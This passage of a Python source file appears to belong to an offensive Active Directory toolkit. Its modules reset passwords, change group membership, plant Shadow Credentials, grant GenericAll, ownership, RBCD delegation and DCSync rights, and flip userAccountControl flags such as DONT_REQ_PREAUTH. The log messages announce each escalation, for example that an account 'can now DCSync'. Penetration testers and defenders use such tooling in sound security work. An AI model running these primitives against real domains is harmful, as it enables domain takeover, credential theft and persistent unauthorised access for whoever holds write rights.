        identity: sAMAccountName, DN, GUID or SID of the target (You must have write permission on it)
        new_pass: new password for the target
    """
    ldap_conn = conn.getLdapConnection()
    target_dn = resolvDN(ldap_conn, identity)

    # If LDAPS is not supported use SAMR
    # if conn.conf.scheme == "ldaps":
    modifyPassword.ad_modify_password(ldap_conn, target_dn, new_pass, old_password=None)
    if ldap_conn.result['result'] != 0:
        raise ResultError(ldap_conn.result)
    # else:
    #     # Check if identity is sAMAccountName
    #     sAMAccountName = identity
    #     for marker in ["dc=", "s-1", "{"]:
    #         if marker in identity.lower():
    #             ldap_filter = '(objectClass=*)'
    #             ldap_conn.search(target_dn, ldap_filter, search_scope=ldap3.BASE, attributes=['SAMAccountName'])
    #             try:
    #                 sAMAccountName = ldap_conn.response[0]['attributes']['sAMAccountName']
    #             except IndexError:
    #                 raise NoResultError(target_dn, ldap_filter)
    #             break

    #     rpcChangePassword(conn, sAMAccountName, new_pass)
    
    LOG.info('[+] Password changed successfully!')


@register_module
def addObjectToGroup(conn, member, group):
    """
    Add an object to a group
        member: sAMAccountName, DN, GUID or SID of the object to add to the group
        group: DN, GUID or SID of the group
    """
    ldap_conn = conn.getLdapConnection()
    member_dn = resolvDN(ldap_conn, member)
    LOG.debug(f"[*] {member} found at {member_dn}")
    group_dn = resolvDN(ldap_conn, group)
    LOG.debug(f"[*] {group} found at {group_dn}")
    addMembersToGroups.ad_add_members_to_groups(ldap_conn, member_dn, group_dn, raise_error=True)
    LOG.info(f"[+] {member_dn} added to {group_dn}")


@register_module
def addForeignObjectToGroup(conn, user_sid, group_dn):
    """
    Add foreign principals (users or groups), coming from a trusted domain, to a group
    Args:
        user_sid: foreign object sid
        group_dn: group DN in which to add the foreign object
    """
    ldap_conn = conn.getLdapConnection()
    # https://social.technet.microsoft.com/Forums/en-US/6b7217e1-a197-4e24-9357-351c2d23edfe/ldap-query-to-add-foreignsecurityprincipals-to-a-group?forum=winserverDS
    magic_user_dn = f"<SID={user_sid}>"
    addMembersToGroups.ad_add_members_to_groups(ldap_conn, magic_user_dn, group_dn, fix=True, raise_error=True)
    LOG.info(f"[+] {user_sid} added to {group_dn}")


@register_module
def delObjectFromGroup(conn, member, group):
    """
    Remove member from group
    Args:
        member: sAMAccountName, DN, GUID or SID of the object to delete from the group
        group: DN, GUID or SID of the group
    """
    ldap_conn = conn.getLdapConnection()
    member_dn = resolvDN(ldap_conn, member)
    group_dn = resolvDN(ldap_conn, group)
    removeMembersFromGroups.ad_remove_members_from_groups(ldap_conn, member_dn, group_dn, True, raise_error=True)
    LOG.info(f"[-] {member} removed from {group_dn}")


@register_module
def getChildObjects(conn, parent_obj, object_type='*'):
    """
    List the child objects of an object
    Args:
        base_obj: DN of the targeted parent object
        object_type: the type of object to fetch (user/computer or * to have them all)
    """
    ldap_conn = conn.getLdapConnection()
    ldap_conn.search(parent_obj, f'(objectClass={object_type})')
    res = [entry['dn'] for entry in ldap_conn.response if entry['type'] == 'searchResEntry']
    for child in res:
        LOG.info(child)
    return res

@register_module
def search(conn, search_base, ldap_filter, attr='*'):
    """
    Search in LDAP database 
    Args:
        search_base: DN of the parent object
        ldap_filter: Filter to apply to the LDAP search (see LDAP filter syntax)
        attr: attributes to fetch (default is '*')
    """
    ldap_conn = conn.getLdapConnection()
    ldap_conn.search(search_base, ldap_filter, search_scope=ldap3.SUBTREE, attributes=attr.split(','))
    print(ldap_conn.response_to_json())


@register_module
def setShadowCredentials(conn, identity, enable="True", outfilePath=None, deviceID=None):
    """
    Add or delete attribute allowing to authenticate as the user provided using a crafted certificate (Shadow Credentials)
    Args:
        identity: sAMAccountName, DN, GUID or SID of the target (You must have write permission on it)        
        enable: True to add Shadow Credentials for the user or False to remove it (default is True)
        outfilePath: file path for the generated certificate (default is current path)
        deviceID: DeviceID of the shadow credentials to remove from the target object (default is all)
    """
    if enable == "True":
        addShadowCredentials(conn, identity, outfilePath)
    else:
        delShadowCredentials(conn, identity, deviceID)


@register_module
def setGenericAll(conn, identity, target, enable="True"):
    """
    Give permission to an AD object to modify the properties of another object
    Args:
        identity: sAMAccountName, DN, GUID or SID of the object you control
        target:  sAMAccountName, GPO name, DN, GUID or SID
        enable: True to add GenericAll for the user or False to remove it (default is True)
    """
    modifySecDesc(conn=conn, identity=identity, target=target, enable=enable, control_flag=dtypes.DACL_SECURITY_INFORMATION)
    if enable == "True":
        LOG.info(f'[+] {identity} can now write the attributes of {target}')


@register_module
def setOwner(conn, identity, target):
    """
    Set an AD object as the owner of the target object
    Args:
        identity: sAMAccountName, DN, GUID or SID of the object you control
        target: sAMAccountName, DN, GUID or SID of the targeted object (You must have WriteOwner permission on it)
    """
    old_sid = modifySecDesc(conn, identity=identity, target=target, control_flag=dtypes.OWNER_SECURITY_INFORMATION)['OwnerSid'].formatCanonical()
    LOG.info(f'[+] Old owner {old_sid} is now replaced by {identity} on {target}')
    return old_sid


@register_module
def setRbcd(conn, spn, target, enable="True"):
    """
    Set Resource Based Constraint Delegation (RBCD) on the target to the SPN provided
    Args:
        spn: sAMAccountName, DN, GUID or SID of the SPN
        target: sAMAccountName, DN, GUID or SID of the target (You must have DACL write on it)
        enable: True to add Rbcd and False to remove it (default is True)
    """
    attr = 'msDS-AllowedToActOnBehalfOfOtherIdentity'
    modifySecDesc(conn=conn, identity=spn, target=target, ldap_attribute=attr, access_mask=ACCESS_FLAGS['ADS_RIGHT_DS_CONTROL_ACCESS'], enable=enable)
    LOG.debug(f"[+] Attribute {attr} correctly set")
    LOG.debug('[+] Delegation rights modified successfully!')
    if enable == "True":
        LOG.info(f'[+] {spn} can now impersonate users on {target} via S4U2Proxy')


@register_module
def setDCSync(conn, identity, enable='True'):
    """
    Set the right to perform DCSync with the user provided (You must have write permission on the domain LDAP object)
    Args:
        identity: sAMAccountName, DN, GUID or SID of the user
        enable: True to add DCSync and False to remove it (default is True)
    """
    modifySecDesc(conn=conn, identity=identity, target=getDefaultNamingContext(conn.getLdapConnection()),
    ldap_filter='(objectCategory=domain)', enable=enable, control_flag=dtypes.DACL_SECURITY_INFORMATION)
    if enable == 'True':
        LOG.info(f'[+] {identity} can now DCSync')

        
@register_module
def setUserAccountControl(conn, identity, flags, enable="True"):
    """
    Enable or disable the flags for the given user (must have a write permission on the UserAccountControl attribute of the target user)
    Args:
        identity: sAMAccountName, DN, GUID or SID of the target
        flags: hexadecimal value corresponding to flags to set (e.g for DONT_REQ PREAUTH: 0x400000)
        enable: True to add the flags or False to delete them (default is True)
    """
    enable = enable == "True"
    flags = int(flags,16)
    
    response = getObjAttr(conn, identity, 'userAccountControl')
    LOG.debug("[*] Original userAccountControl: "+str(response['attributes']['userAccountControl']))
    rawAccountControl = int(response['raw_attributes']['userAccountControl'][0].decode())

    if enable:
        rawAccountControl = rawAccountControl | flags
    else:
        rawAccountControl = rawAccountControl & ~flags

    setAttribute(conn, identity, 'userAccountControl', str(rawAccountControl))
